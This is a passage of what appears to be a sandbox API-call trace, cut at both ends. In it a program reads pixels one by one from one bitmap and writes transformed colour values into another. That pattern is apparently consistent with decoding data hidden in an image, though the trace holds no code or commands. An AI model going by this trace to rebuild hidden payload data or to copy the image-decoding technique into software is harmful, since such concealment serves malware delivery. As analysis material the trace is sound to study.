GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.903] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=99, y=0, color=0x18e3e0) returned 0x0 [0272.903] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.903] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.903] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.903] GdipBitmapSetPixel (bitmap=0x5d1b670, x=99, y=0, color=0x74e78787) returned 0x0 [0272.903] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.903] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.903] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=100, y=0, color=0x18e3e0) returned 0x0 [0272.903] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.903] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.903] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.903] GdipBitmapSetPixel (bitmap=0x5d1b670, x=100, y=0, color=0x1951f41d) returned 0x0 [0272.903] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.903] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.903] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=101, y=0, color=0x18e3e0) returned 0x0 [0272.903] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.903] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.904] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.904] GdipBitmapSetPixel (bitmap=0x5d1b670, x=101, y=0, color=0x78781911) returned 0x0 [0272.904] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.904] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.904] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=102, y=0, color=0x18e3e0) returned 0x0 [0272.904] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.904] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.904] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.904] GdipBitmapSetPixel (bitmap=0x5d1b670, x=102, y=0, color=0x78087878) returned 0x0 [0272.904] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.904] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.904] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=103, y=0, color=0x18e3e0) returned 0x0 [0272.904] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.904] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.904] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.904] GdipBitmapSetPixel (bitmap=0x5d1b670, x=103, y=0, color=0x237e781d) returned 0x0 [0272.904] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.904] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.904] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=104, y=0, color=0x18e3e0) returned 0x0 [0272.905] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.905] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.905] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.905] GdipBitmapSetPixel (bitmap=0x5d1b670, x=104, y=0, color=0x7c76e778) returned 0x0 [0272.905] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.905] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.905] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=105, y=0, color=0x18e3e0) returned 0x0 [0272.905] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.905] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.905] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.905] GdipBitmapSetPixel (bitmap=0x5d1b670, x=105, y=0, color=0x781d3650) returned 0x0 [0272.905] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.905] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.905] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=106, y=0, color=0x18e3e0) returned 0x0 [0272.905] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.905] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.905] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.905] GdipBitmapSetPixel (bitmap=0x5d1b670, x=106, y=0, color=0x8c417f08) returned 0x0 [0272.905] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.905] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.906] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=107, y=0, color=0x18e3e0) returned 0x0 [0272.906] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.906] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.906] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.906] GdipBitmapSetPixel (bitmap=0x5d1b670, x=107, y=0, color=0x6b221869) returned 0x0 [0272.906] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.906] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.906] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=108, y=0, color=0x18e3e0) returned 0x0 [0272.906] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.906] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.906] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.906] GdipBitmapSetPixel (bitmap=0x5d1b670, x=108, y=0, color=0x7971407f) returned 0x0 [0272.906] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.906] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.906] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=109, y=0, color=0x18e3e0) returned 0x0 [0272.906] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.906] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.906] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.906] GdipBitmapSetPixel (bitmap=0x5d1b670, x=109, y=0, color=0x1c6b7819) returned 0x0 [0272.906] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.906] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.907] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=110, y=0, color=0x18e3e0) returned 0x0 [0272.907] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.907] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.907] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.907] GdipBitmapSetPixel (bitmap=0x5d1b670, x=110, y=0, color=0x7a7a087a) returned 0x0 [0272.907] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.907] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.907] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=111, y=0, color=0x18e3e0) returned 0x0 [0272.907] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.907] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.907] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.907] GdipBitmapSetPixel (bitmap=0x5d1b670, x=111, y=0, color=0x78194079) returned 0x0 [0272.907] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.907] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.907] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=112, y=0, color=0x18e3e0) returned 0x0 [0272.907] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.907] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.907] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.907] GdipBitmapSetPixel (bitmap=0x5d1b670, x=112, y=0, color=0x217e781c) returned 0x0 [0272.907] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.907] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.908] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=113, y=0, color=0x18e3e0) returned 0x0 [0272.908] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.908] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.908] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.908] GdipBitmapSetPixel (bitmap=0x5d1b670, x=113, y=0, color=0x6b79e76e) returned 0x0 [0272.908] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.908] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.908] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=114, y=0, color=0x18e3e0) returned 0x0 [0272.908] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.908] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.908] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.908] GdipBitmapSetPixel (bitmap=0x5d1b670, x=114, y=0, color=0x7c6a507b) returned 0x0 [0272.908] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.908] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.908] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=115, y=0, color=0x18e3e0) returned 0x0 [0272.908] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.908] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.908] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.908] GdipBitmapSetPixel (bitmap=0x5d1b670, x=115, y=0, color=0xd6505319) returned 0x0 [0272.908] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.908] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.959] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=116, y=0, color=0x18e3e0) returned 0x0 [0272.959] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.959] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.959] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.959] GdipBitmapSetPixel (bitmap=0x5d1b670, x=116, y=0, color=0x6b204373) returned 0x0 [0272.959] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.959] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.959] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=117, y=0, color=0x18e3e0) returned 0x0 [0272.959] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.959] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.960] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.960] GdipBitmapSetPixel (bitmap=0x5d1b670, x=117, y=0, color=0x78197878) returned 0x0 [0272.960] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.960] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.960] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=118, y=0, color=0x18e3e0) returned 0x0 [0272.960] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.960] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.960] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.960] GdipBitmapSetPixel (bitmap=0x5d1b670, x=118, y=0, color=0x18547819) returned 0x0 [0272.960] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.960] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.960] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=119, y=0, color=0x18e3e0) returned 0x0 [0272.960] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.960] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.960] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.960] GdipBitmapSetPixel (bitmap=0x5d1b670, x=119, y=0, color=0xcb053978) returned 0x0 [0272.960] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.960] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.960] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=120, y=0, color=0x18e3e0) returned 0x0 [0272.961] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.961] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.961] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.961] GdipBitmapSetPixel (bitmap=0x5d1b670, x=120, y=0, color=0x78195272) returned 0x0 [0272.961] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.961] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.961] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=121, y=0, color=0x18e3e0) returned 0x0 [0272.961] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.961] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.961] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.961] GdipBitmapSetPixel (bitmap=0x5d1b670, x=121, y=0, color=0x88787e7) returned 0x0 [0272.961] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.961] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.961] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=122, y=0, color=0x18e3e0) returned 0x0 [0272.961] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.961] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.961] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.961] GdipBitmapSetPixel (bitmap=0x5d1b670, x=122, y=0, color=0x52721978) returned 0x0 [0272.961] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.962] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.962] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=123, y=0, color=0x18e3e0) returned 0x0 [0272.962] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.962] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.962] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.962] GdipBitmapSetPixel (bitmap=0x5d1b670, x=123, y=0, color=0x368a787e) returned 0x0 [0272.962] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.962] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.962] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=124, y=0, color=0x18e3e0) returned 0x0 [0272.962] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.962] GdipGetImageWidth (image=0x5d1b670, width=0x18e3d8) returned 0x0 [0272.962] GdipGetImageHeight (image=0x5d1b670, height=0x18e3d8) returned 0x0 [0272.962] GdipBitmapSetPixel (bitmap=0x5d1b670, x=124, y=0, color=0x19797a5e) returned 0x0 [0272.962] GdipGetImageWidth (image=0x5d1a9c8, width=0x18e3d0) returned 0x0 [0272.962] GdipGetImageHeight (image=0x5d1a9c8, height=0x18e3d0) returned 0x0 [0272.962] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=125, y=0, color=0x18e3e0) returned 0x0 [0272.962] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.962] GdipBitmapSetPixel (bitmap=0x5d1b670, x=125, y=0, color=0x33131969) returned 0x0 [0272.963] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=126, y=0, color=0x18e3e0) returned 0x0 [0272.963] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.963] GdipBitmapSetPixel (bitmap=0x5d1b670, x=126, y=0, color=0x79970211) returned 0x0 [0272.963] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=127, y=0, color=0x18e3e0) returned 0x0 [0272.963] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.963] GdipBitmapSetPixel (bitmap=0x5d1b670, x=127, y=0, color=0x368c7818) returned 0x0 [0272.963] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=128, y=0, color=0x18e3e0) returned 0x0 [0272.963] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.963] GdipBitmapSetPixel (bitmap=0x5d1b670, x=128, y=0, color=0x2b541963) returned 0x0 [0272.963] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=129, y=0, color=0x18e3e0) returned 0x0 [0272.963] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.963] GdipBitmapSetPixel (bitmap=0x5d1b670, x=129, y=0, color=0xf89782c) returned 0x0 [0272.963] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=130, y=0, color=0x18e3e0) returned 0x0 [0272.963] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.963] GdipBitmapSetPixel (bitmap=0x5d1b670, x=130, y=0, color=0x8cb478a2) returned 0x0 [0272.963] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=131, y=0, color=0x18e3e0) returned 0x0 [0272.963] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.963] GdipBitmapSetPixel (bitmap=0x5d1b670, x=131, y=0, color=0xbd141878) returned 0x0 [0272.963] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=132, y=0, color=0x18e3e0) returned 0x0 [0272.964] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.964] GdipBitmapSetPixel (bitmap=0x5d1b670, x=132, y=0, color=0x78197900) returned 0x0 [0272.964] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=133, y=0, color=0x18e3e0) returned 0x0 [0272.964] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.964] GdipBitmapSetPixel (bitmap=0x5d1b670, x=133, y=0, color=0xcfc47a0f) returned 0x0 [0272.964] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=134, y=0, color=0x18e3e0) returned 0x0 [0272.964] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.964] GdipBitmapSetPixel (bitmap=0x5d1b670, x=134, y=0, color=0x8ac81b3e) returned 0x0 [0272.964] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=135, y=0, color=0x18e3e0) returned 0x0 [0272.964] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.964] GdipBitmapSetPixel (bitmap=0x5d1b670, x=135, y=0, color=0x77197a0c) returned 0x0 [0272.964] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=136, y=0, color=0x18e3e0) returned 0x0 [0272.964] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.964] GdipBitmapSetPixel (bitmap=0x5d1b670, x=136, y=0, color=0x22ac7ad5) returned 0x0 [0272.964] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=137, y=0, color=0x18e3e0) returned 0x0 [0272.964] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.964] GdipBitmapSetPixel (bitmap=0x5d1b670, x=137, y=0, color=0x977c1a62) returned 0x0 [0272.964] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=138, y=0, color=0x18e3e0) returned 0x0 [0272.964] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.964] GdipBitmapSetPixel (bitmap=0x5d1b670, x=138, y=0, color=0x8b017b08) returned 0x0 [0272.965] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=139, y=0, color=0x18e3e0) returned 0x0 [0272.965] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.965] GdipBitmapSetPixel (bitmap=0x5d1b670, x=139, y=0, color=0x13347bab) returned 0x0 [0272.965] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=140, y=0, color=0x18e3e0) returned 0x0 [0272.965] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.965] GdipBitmapSetPixel (bitmap=0x5d1b670, x=140, y=0, color=0x42401d70) returned 0x0 [0272.965] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=141, y=0, color=0x18e3e0) returned 0x0 [0272.965] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.965] GdipBitmapSetPixel (bitmap=0x5d1b670, x=141, y=0, color=0x27997cf1) returned 0x0 [0272.965] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=142, y=0, color=0x18e3e0) returned 0x0 [0272.965] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.965] GdipBitmapSetPixel (bitmap=0x5d1b670, x=142, y=0, color=0x197845df) returned 0x0 [0272.965] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=143, y=0, color=0x18e3e0) returned 0x0 [0272.965] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.965] GdipBitmapSetPixel (bitmap=0x5d1b670, x=143, y=0, color=0x78791978) returned 0x0 [0272.965] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=144, y=0, color=0x18e3e0) returned 0x0 [0272.965] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.965] GdipBitmapSetPixel (bitmap=0x5d1b670, x=144, y=0, color=0x45df787a) returned 0x0 [0272.965] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=145, y=0, color=0x18e3e0) returned 0x0 [0272.965] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.966] GdipBitmapSetPixel (bitmap=0x5d1b670, x=145, y=0, color=0x197845df) returned 0x0 [0272.966] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=146, y=0, color=0x18e3e0) returned 0x0 [0272.966] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.966] GdipBitmapSetPixel (bitmap=0x5d1b670, x=146, y=0, color=0x78791978) returned 0x0 [0272.966] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=147, y=0, color=0x18e3e0) returned 0x0 [0272.966] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.966] GdipBitmapSetPixel (bitmap=0x5d1b670, x=147, y=0, color=0x45df787a) returned 0x0 [0272.966] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=148, y=0, color=0x18e3e0) returned 0x0 [0272.966] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.966] GdipBitmapSetPixel (bitmap=0x5d1b670, x=148, y=0, color=0x1b097ef2) returned 0x0 [0272.966] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=149, y=0, color=0x18e3e0) returned 0x0 [0272.966] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.966] GdipBitmapSetPixel (bitmap=0x5d1b670, x=149, y=0, color=0xff9e1b59) returned 0x0 [0272.966] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=150, y=0, color=0x18e3e0) returned 0x0 [0272.966] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.966] GdipBitmapSetPixel (bitmap=0x5d1b670, x=150, y=0, color=0x5dbf7213) returned 0x0 [0272.966] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=151, y=0, color=0x18e3e0) returned 0x0 [0272.966] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.966] GdipBitmapSetPixel (bitmap=0x5d1b670, x=151, y=0, color=0x17b15eed) returned 0x0 [0272.967] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=152, y=0, color=0x18e3e0) returned 0x0 [0272.967] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.967] GdipBitmapSetPixel (bitmap=0x5d1b670, x=152, y=0, color=0x1f561978) returned 0x0 [0272.967] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=153, y=0, color=0x18e3e0) returned 0x0 [0272.967] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.967] GdipBitmapSetPixel (bitmap=0x5d1b670, x=153, y=0, color=0x78967ad3) returned 0x0 [0272.967] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=154, y=0, color=0x18e3e0) returned 0x0 [0272.967] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.967] GdipBitmapSetPixel (bitmap=0x5d1b670, x=154, y=0, color=0x6c1a116b) returned 0x0 [0272.967] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=155, y=0, color=0x18e3e0) returned 0x0 [0272.967] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.967] GdipBitmapSetPixel (bitmap=0x5d1b670, x=155, y=0, color=0xf89ab3f8) returned 0x0 [0272.967] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=156, y=0, color=0x18e3e0) returned 0x0 [0272.967] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.967] GdipBitmapSetPixel (bitmap=0x5d1b670, x=156, y=0, color=0xf5a1f40) returned 0x0 [0272.967] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=157, y=0, color=0x18e3e0) returned 0x0 [0272.967] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.967] GdipBitmapSetPixel (bitmap=0x5d1b670, x=157, y=0, color=0x74191d6b) returned 0x0 [0272.967] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=158, y=0, color=0x18e3e0) returned 0x0 [0272.967] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.968] GdipBitmapSetPixel (bitmap=0x5d1b670, x=158, y=0, color=0xd4f9fbd6) returned 0x0 [0272.968] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=159, y=0, color=0x18e3e0) returned 0x0 [0272.968] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.968] GdipBitmapSetPixel (bitmap=0x5d1b670, x=159, y=0, color=0xf3999ad6) returned 0x0 [0272.968] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=160, y=0, color=0x18e3e0) returned 0x0 [0272.968] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.968] GdipBitmapSetPixel (bitmap=0x5d1b670, x=160, y=0, color=0xb7f99a94) returned 0x0 [0272.968] GdipBitmapGetPixel (bitmap=0x5d1a9c8, x=161, y=0, color=0x18e3e0) returned 0x0 [0272.968] GdipGetImagePixelFormat (image=0x5d1b670, format=0x18e3d8) returned 0x0 [0272.968] GdipBitmapSetPixel (bitmap=0x5d1b670, x=161, y=0, color=0x9ad5999a) returned 0x0 [0272.968] GdipBitmapGetPixel (bitmap=0x5d1a9c8, 